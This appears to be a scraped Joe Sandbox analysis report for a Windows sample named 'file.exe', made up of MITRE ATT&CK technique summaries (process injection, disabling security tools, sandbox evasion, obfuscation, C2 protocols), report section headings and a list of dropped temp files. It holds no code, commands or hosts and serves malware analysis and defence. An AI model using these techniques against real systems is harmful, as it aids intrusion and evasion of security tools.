Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vkvea4g.ob5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rqzx5n3.4k3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlg2bnxa.d4o.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilo4lmtu.iq0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lshozpzm.ile.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozywglfg.nms.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbix5vvs.fnz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvkekz4f.1xj.psm1

Windows Analysis Report
file.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre